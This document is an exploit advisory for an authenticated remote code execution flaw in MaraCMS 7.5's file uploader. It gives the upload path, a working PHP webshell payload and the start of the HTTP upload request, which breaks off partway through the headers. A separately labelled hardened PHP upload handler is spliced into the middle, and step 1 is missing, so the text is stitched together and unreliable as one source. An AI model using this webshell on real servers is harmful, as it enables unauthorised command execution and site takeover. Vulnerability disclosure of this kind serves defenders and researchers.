Mara cms 7.5 remote code execution (authenticated) Vulnerability / Exploit
Exploit / Vulnerability Discovered: 2020-09-01 | Type: webapps | Platform: php
This exploit / vulnerability, Mara cms 7.5 remote code execution (authenticated), is for educational purposes only; if you use it, you do so at your own risk!
MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution.
In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'.
The file uploader fails to check extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE.
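A server-side check of the kind the uploader is missing, as an added example (not MaraCMS code and not part of the original advisory). The function name, the allow-list and the storage directory are assumptions, and the content check needs PHP's fileinfo extension.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical hardened upload handler, not MaraCMS code.
// Assumed policy: extension => expected MIME type. Anything else is refused.
const ALLOWED_UPLOADS = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
    'pdf' => 'application/pdf',
];

// Validates one entry of $_FILES and stores it under a server-chosen name.
// $storageDir is assumed to be outside the web root (or to have script
// execution disabled), so a stored file is never interpreted as PHP.
function store_upload(array $file, string $storageDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file((string) ($file['tmp_name'] ?? ''))) {
        throw new RuntimeException('Upload failed');
    }

    // Use only the final path component of the client-supplied name.
    $name = basename((string) ($file['name'] ?? ''));

    // Require exactly "<stem>.<ext>": this refuses webshell.php, shell.php.jpg,
    // "shell.php." and names with control characters or NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/D', $name, $m)) {
        throw new RuntimeException('File name not allowed');
    }
    $ext = strtolower($m[1]);
    if (!array_key_exists($ext, ALLOWED_UPLOADS)) {
        throw new RuntimeException('Extension not allowed');
    }

    // The content must match the type the extension claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_UPLOADS[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }

    // Never reuse the client's name on disk.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($storageDir, '/') . '/' . $stored)) {
        throw new RuntimeException('Could not store upload');
    }
    return $stored;
}
```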
2. Navigate to the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'.
A request similar to the following will be made:
POST /codebase/handler.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268
Content-Length: 1282
Origin: http://localhost
Connection: close
Referer: http://localhost/codebase/dir.php?type=filenew
Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv
Upgrade-Insecure-Requests: 1